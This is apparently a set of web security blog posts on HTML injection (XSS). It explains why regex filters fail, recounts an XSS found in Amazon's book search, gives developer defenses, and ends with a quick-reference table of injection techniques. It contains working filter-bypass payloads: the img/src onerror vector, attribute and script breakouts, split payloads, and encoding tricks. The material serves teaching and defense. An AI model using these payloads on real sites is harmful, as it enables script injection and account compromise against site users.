HTML tags start with the < character, followed by an alpha character, followed by zero or more attributes (with tokenization properties that create things name/value pairs), and close with the > character. It’s likely the regex was only searching for “on…” handlers within the context of an element, i.e. between < and > (the start and end tokens). A > character inside an attribute value doesn’t close the element.

<tag attribute="x>"...onevent=code>

The browser’s parsing model understood the quoted string was a value token. It correctly handled the state transitions between element start, element name, attribute name, attribute value, and so on. The parser consumed each character and interpreted it based on the context of its current state.

The site’s poorly-formed regex didn’t create a sophisticated enough state machine to handle the “x>” properly. (Regexes have their own internal state machines for pattern matching. I’m referring to the pattern’s implied state machine for HTML.) It looked for a start token, then switched to consuming characters until it found an event handler or encountered an end token — ignoring the possible interim states associated with tokenization based on spaces, attributes, or invalid markup.

This was only a small step into the realm of HTML injection. For example, the web site reflected the payload on the immediate response to the attack’s request. In other scenarios the site might hold on to the payload and insert it into a different page. It’s still reflected by the site, but not on the immediate response. That would make it a persistent type of vuln because the attacker does not have to re-inject the payload each time the affected page is viewed. For example, lots of sites have phrases like, “Welcome back, Mike!”, where they print your first name at the top of each page. If you told the site your name was “<script>alert(9)</script>”, then you’d have a persistent HTML injection exploit.

Rethink Defense

For developers:

  • When user-supplied data is placed in a web page, encode it for the appropriate context. For example, use percent-encoding (e.g. < becomes %3c) for an href attribute; use HTML entities (e.g. < becomes &lt;) for text nodes.
  • Prefer inclusion lists (match what you expect) to exclusion lists (predict what you think should be blocked).
  • Work with a consistent character encoding. Unpredictable transcoding between character sets makes it harder to ensure validation filters treat strings correctly.
  • Prefer parsing to pattern matching. However, pre-HTML5 parsing has its own pitfalls, such as browsers’ inconsistent handling of whitespace within tag names. HTML5 codified explicit rules for acceptable markup.
  • If you use regexes, test them thoroughly. Sometimes a “dumb” regex is better than a “smart” one. In this case, a dumb regex would have just looked for any occurrence of “onerror” and rejected it.
  • Prefer to reject invalid input rather than massage it into something valid. This avoids a cuckoo-like attack where a single-pass filter would remove any occurrence of the word “script” from a payload like “<scrscriptipt>”, unintentionally creating a <script> tag.
  • Prefer to reject invalid character code points (and unexpected encoding) rather than substitute or strip characters. This prevents attacks like null-byte insertion, e.g. stripping null from &lgt;%00script> after performing the validation check, overlong UTF-8 encoding, e.g. %c0%bcscript%c0%bd, or Unicode encoding (when expecting UTF-8), e.g. %u003cscript%u003e.
  • Make sure to escape metacharacters correctly.

For more examples of payloads that target different HTML contexts or employ different anti-regex techniques, check out the HTML Injection Quick Reference (HIQR). In particular, experiment with different payloads from the “Anti-regex patterns” at the bottom of Table 2.


Page 71

My Zombie Incursion into Amazon.com

This is how it began. Over two years ago I unwittingly planted the seeds of an undead horde into the pages of my book, Seven Deadliest Web Application Attacks. Only recently did I discover the rotted fruit of those seeds festering within the pages of Amazon.

  • Visit the book’s Amazon page.
  • Click on the “Look Inside!” feature.
  • Use the “Search Inside This Book” function to search for zombie.
  • Cower before approaching mass of flesh-hungry brutes. Or just click OK a few times.

(Note that Internet Explorer 9 might repel the attack.)

On page 16 of the book there is an example of an HTML element’s syntax that forgoes the typical whitespace used to separate attributes. The element’s name is followed by a valid token separator, albeit one rarely used in hand-written HTML. The printed text contains this line:

<img/src="."alt=""onerror="alert('zombie')"/>

The “Search Inside” feature lists the matches for a search term. It makes the search term bold (i.e. adds <b> markup) and includes the context in which the search term was found (hence the surrounding text with the full <img/src=”.”alt=”" /> element). Then it just pops the contextual find into the list, to be treated as any other “text” extracted from the book.

<img src="." alt="" onerror="alert('<b>zombie</b>')"/>

Finally, the matched term is placed within an anchor so you can click on it to find the relevant page. Notice that the <img> tag hasn’t been inoculated with HTML entities; it’s a classic HTML injection attack.

<a class="sitbReader-result-link sitbReader-link-visited sitbReader-link-selected" onclick="SitbReader.RefTag.post(SitbReader.RefTag.Actions.searchResult,SitbReader.RefTag.LandingPage.excerpt); SitbReader.SearchActions.goToSearchResult(2)" href="javascript:void(0)"><span class="sitbReaderSearch-result-page">Page 16 ...t require spaces to delimit their attributes. <img src="." alt="" onerror="alert('<b>zombie</b>')"/> JavaScript doesn't have to...

This has actually happened before. In December 2010 a researcher in Germany, Dr. Wetter, reported the same effect via <script> tags when searching for content in different security books. He even found <script> tags whose src attribute pointed to a live host, which made the flaw infinitely more entertaining.

In fact, this was such a clever example of an unexpected vector for HTML injection that I included Dr. Wetter’s findings in the new Hacking Web Apps book (pages 40 and 41, the same <img…onerror> example shows up a little later on page 59). Behold, there’s a different infestation on page 31. Try searching for zombie again. This time the server responds with a JSON payload that contains straight-forward <script> tags. This one was more tedious to track down. The <script> tags don’t appear in the search listing, but they do exist in the excerpt property of the JavaScript object that contains, applies bold tags, etc. for matches:

{...,"totalResults":2,"results":[[52,"Page 31","... encoded characters with their literal values:  <a href=\"http://\"/><script>alert('<b>zombie</b>')</script>@some.site/\">search again</a>   Abusing the authority component of a ...", ...}

I only discovered this injection flaw when I recently searched the older book for references to the living dead. (Yes, a weird -- but true -- reason.)

How did this happen?

One theory is that an anti-XSS filter relied on a blacklist to catch potentially malicious tags. In this case, the <img> tag used a valid, but uncommon, token separator that would have confused any filter expecting whitespace delimiters. One common approach to regexes is to build a pattern based on what we think browsers know. For example, a quick filter to catch <script> tags or opening tags (e.g. <iframe src...> or <img src...>) might look like this:

<[[:alpha:]]+(\s+|>)

A payload like <img/src> bypasses the regex and the browser correctly parses the syntax to create an image element. Of course, the src attribute fails to resolve, thereby triggering the onerror event handler, leading to yet another banal alert() declaring the presence of an HTML injection attack.

The <script> example is less clear without knowing more about the internals of the site. Perhaps a sequences of stripping quotes and buggy regexes misunderstood the href to actually contain an authority section? Don't have a good guess for this one.

This highlights one problem of relying on regexes to parse a grammar like HTML. Yes, it's possible to create strong, effective regexes. However, a regex does not represent the parsing state machine of browsers, including their quirks, exceptions, and "fix-up" behaviors. Fortunately, HTML5 brings a measure of sanity to this mess by clearly defining rules of interpretation. On the other hand, web history foretells that we'll be burdened with legacy modes and outdated browsers for years to come. So, be wary of those regexes.

No, how did this really happen?

Well, I listen to various music while I write. You might argue that it was the demonic influence (or awesome Tony Iommi riffs) of Black Sabbath that ensorcelled the pages or that Judas Priest made me do it. Or that March 30, 2010 -- right around the book's release -- was a full moon. Maybe in one of Amazon's vast, diversley-stocked warehouses an oil drum with military markings spilled over, releasing a toxic gas that infected the books. Me? I think we'll never know.

Maybe one day we'll be safe from this kind of attack. HTML5 and Content Security Policy make more sandboxes and controls available for implementing countermeasures. But I just can't shake the feeling that somehow, somewhere, there're more lurking about.

Until then, the most secure solution is to -- oh, one moment please, there's a noise at the door.

They're coming to get you, Barbara.

Stop Building HTML on the Server

Many web sites conceptually fit into the Model-View-Controller (MVC) design pattern despite (or often in spite of) the site’s actual code design. The server pieces together user data, state data, and other bits of HTML to send to the browser. One of the biggest frustrations with automating web app testing is dealing with poorly written web applications, especially the “View” — the HTML to be shown in the browser. A brief list of complaints includes: HTML with typos, outright invalid HTML, HTTP headers omitted, headers incorrect, strange state mechanisms, and weird case sensitivity issues.

Blackbox scanning fundamentally interacts only with content (HTML) and transport (HTTP and its accompanying statefulness as created by cookies). A scanner primarily bases its understanding of a web application on the site’s conceptual View. Whitebox testing, e.g. source code scanning, has more insight into the application’s functionality and can therefore more easily find vulns in our conceptually defined Model and Controller components that reside on the server.

HTML injection (a.k.a XSS) is probably the best example of vulnerabilities that arise due to View problems. For those few still unfamiliar with the term: HTML injection occurs when data to be displayed in a web page ends up modifying the page’s underlying structure. The structure is referred to as the Document Object Model (DOM). For example, a text node expecting to hold the user’s first name may unintentionally turn into a script node when the user’s name becomes “<script>alert(0)</script>” instead of “Trudy”.

The DOM also changes when characters like extraneous quotes appear in the syntax of href or input value attributes, for example:

<a href=”http://web.site/search.page?s=cars”onMouseover=alert(0);a=”>Search again</a>

Zip Code:<input name=zip_code value=‘90210‘onMouseover=alert(0);a=’>

In the two previous cases the data, a search string and a zip code, changed the page’s structure by adding an onMouseover attribute (with innocuous payload, yawn) to the anchor and input tags. The data wasn’t even intended to be displayed to the user, yet it is used in a way that pollutes the View.

Ah, so we’ve finally come back to that concept: the View. Now we get to mention frameworks. Specifically, JavaScript-based browser development frameworks like Dojo, Ext JS, Prototype, and YUI. These frameworks help move the uninteresting part of the UI Controller into the browser. In other words, the server doesn’t have to care about the visual effects of dragging and dropping an email message between folders, displaying data in a tree view, sorting a list, or other interactions that take place in the browser.

JavaScript frameworks enable the site’s UI (its View) to be well-separated from the server-side processing. It should follow that the web site can create a simpler, stricter set of functions that operate on well-defined data.

In other words, the server exposes APIs that respond to very small, atomic requests with very small, atomic responses. The server no longer has to deal with writing complete HTML pages for every response. This doesn’t absolve the server from dealing with encoding issues, but it centralizes the problem more cleanly because functions can be better focused on a single purpose. For example, a drag and drop of an email between folders in a browser requires an API call that verifies access to the message, its source and destination, and updates the message’s state. The server can respond as simply as “succeeded” or “failed” and leave the HTML updating to the browser’s JavaScript library.

Design vs. Implementation

Adopting a browser-side framework entails a significant amount of design effort (in terms of both visual style and software). This design effort can have several positive side-effects, including a reduction in the kinds of implementation errors that lead to HTML injection vulnerabilities. For example, the server can concern itself with ensuring a consistent encoding format for all output and the browser can display that output using well-defined, centralized functions. This is a far cry from ad-hoc HTML generation on the server. While software will always suffer from typos and bugs, a framework at least provides the tools to make a web site more secure by default.

There are some other areas where frameworks quite easily improve design security: CSRF and click-jacking countermeasures. Several frameworks have built-in countermeasures for these two types of attacks. Keep in mind that the countermeasures may not provide complete protection, but the defenses they provide are infinitely better than zero if your site current lacks any defense and most likely better than a home-grown countermeasure based on an incomplete understanding of the problem.1 After all, the framework’s countermeasures have been designed and tested by a large group of developers. Some of them even know a thing or two about security.

Right now frameworks largely rely on JavaScript-based tricks to block CSRF and click-jacking rather than more reliable Header-based ones that recent browsers provide. Of course, it’s a bit early to expect the majority of users’ browsers to include the Origin header2 so this still favors frameworks. (The Origin header is a more reliable version of the Referer header and as such can thwart CSRF attacks. And before you write in with nifty counterexamples of all the ways the Origin header can fail and shouldn’t be trusted, make sure your example doesn’t require an HTML injection, a.k.a. XSS, exploit as well — that’s a different problem.) Conversely, web sites can add click-jacking protection by setting the X-Frame-Options header3, but the number of users with browsers that would benefit is still limited.

Frameworks do not always reduce design errors. Obviously, they have no bearing on server-side design or implementation. User impersonation, data access controls, and authorization will not magically improve. A richer UI might introduce more complex interactions between data and user objects, which implies more chances for security failures.

JavaScript frameworks make the automated analysis of sites more difficult. Web application scanners have trouble testing them and even manually-aided tools like Selenium run into problems with dynamically changing DOMs. We’ll cover those issues in more detail in a separate post. Until then, consider introducing a browser development framework into your site in order to better consolidate server-side processing to a discrete set of APIs and leave HTML manipulation to the browser.

=====
1 You could always start with a book.
2 https://wiki.mozilla.org/Security/Origin
3 http://blogs.msdn.com/b/ie/archive/2009/01/27/ie8-security-part-vii-clickjacking-defenses.aspx

HTML Injection Quick Reference

The Book takes care to explain the elevation of Cross-Site Scripting (XSS) to the title of HTML Injection. This quick reference describes some of the common techniques used to inject a payload into a web application.

In the examples below the biohazard symbol (U+2623), ☣, represents an executable JavaScript payload. It could be anything from a while loop to lock the browser, e.g. while(1){a=1;}, or something more useful that a creative attacker comes up with. You can quite easily find “XSS Cheat Sheets” elsewhere. The intent of this reference is to instill a sense of methodology into finding HTML injection vulnerabilities. Good exploits take advantage of HTML syntax and browser quirks in creative ways. Take the time to experiment with simple payloads and observe how (and where) the web application reflects them. Then turn towards the list of complex attacks on a cheat sheet.

Also notice how the syntax of elements and JavaScript have been preserved in cases where single- or double-quotes are used to prefix a payload. The injected quote prematurely ends a quoted string, which means there will be a dangling quote at the end. Whether the reflection point is in an intrinsic event or a JavaScript block, the dangling quote is trivially consumed by throwing an extra variable definition with an open quote:

;a="

The dangling quote will close the delimiter and, in most cases, the syntax will be preserved. This type of closure isn’t really necessary for an exploit to work, but it’s a sign craftier exploits.

The table’s layout is a bit constrained by the format of this post. Keep an eye on it for updates to content as well as presentation.

table { border-collapse: collapse; border: solid }thead { border: solid medium; text-align: center; }td { border: solid thin; text-align: center; padding: 2px; }.leftText { text-align: left }

Technique Characters Payload Example Injection Example
Close a start tag in order to insert a new element

(This usually happens within an element attribute, but keep in mind HTML comments and XML CDATA.)

>
/>
–>
]]>
><script>☣<script> <input type=text name=id value=
><script>☣<script>

>
Insert an end tag in order to insert a new element

(Also useful where XML appears, such as RSS feeds.)

</element>
]]>
]]><script>☣<script> <INFO><![CDATA[
]]><script>☣</script>
Close a quoted attribute in order to insert an intrinsic event ” (ASCII 0×22)
‘ (ASCII 0×27)
“onEvent=☣;a=” <a href=”/redir?url=http://&#8221; onClick=☣;a=”“>
Break out of a JavaScript variable ” (ASCII 0×22)
‘ (ASCII 0×27)
“;{☣}var foo=” <script>
var host = window.location;
var lastLink = “http://web.site/index?refurl=“;{☣}var foo=”“;

<script>
Split payload across multiple reflection points

(Also a good way to bypass filters. Use HTML comment delimiters to elide content between the two payloads. In some cases you might be able to use quoted strings to elide content.)

(as above) 1: “<script<!–

2: –>>☣</script>

<input value=”“<script<!– “>other content <input value=” –>>☣</script>
Alter MIME interpretation of uploaded file

(Usually when content is expected to be served as text/plain, binary, or other non-HTML type)

Must be able to influence Content-Type header or browser’s MIME sniffing algorithm text/html

application/x-javascript

Uploaded file contains JavaScript.
Image EXIF data contains HTML & JavaScript.
Bypass a filter using browser quirk Alternate whitespace character

Non-standard element or attribute

- See http://x86.cx/html5/ for an example of a complex src attribute for an img element.
Bypass a filter using alternate or invalid character encoding

(The goal is to find a sequence that disrupts or confuses a parser enough that a character such as ASCII 0×22 is considered part of a multibyte sequence, but is served to the browser as a single-byte character. This would either occur because a server-side filter incorrectly stripped or rewrote the invalid sequence or the browser’s character parser misinterpreted the sequence.)

UTF-7
UTF-8
Unicode
- %fe%22
%fd%22
%cd%22
%c1%22
%c0%a2
%80%22
%22
JavaScript execution in CSS and style definitions

[Obsolete for modern browsers due to security concerns]

- - IE Expressions
Mozilla -moz-binding